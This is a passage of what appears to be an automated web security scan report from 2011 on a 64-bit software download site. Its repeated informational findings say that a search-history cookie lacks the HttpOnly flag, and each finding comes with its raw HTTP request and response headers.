The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-topic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 84529


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.891. http://www.x64bitdownload.com/64-bit-troll-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-troll-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-troll-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.892. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-troll-killer-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22troll-killer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22troll+killer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-troll-killer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22troll-killer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22troll+killer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31427


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.893. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-trollkiller-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-trollkiller-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28488


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.894. http://www.x64bitdownload.com/64-bit-use-next-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-use-next-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-use-next-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.895. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.896. http://www.x64bitdownload.com/64-bit-usenet-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-usenet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.897. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-search-engine-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-usenet-search-engine-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.898. http://www.x64bitdownload.com/64-bit-usenext-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenext-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-usenext-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.899. http://www.x64bitdownload.com/64-bit-video-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-video-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-video-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.900. http://www.x64bitdownload.com/64-bit-xpat-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-xpat-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-xpat-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28893


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.901. http://www.x64bitdownload.com/64-bit-yenc-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-yenc-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-yenc-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.902. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.903. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-business-downloads-2-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85656


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.904. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.905. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:23 GMT
Server: Apache/2.2.9 (Fedora)
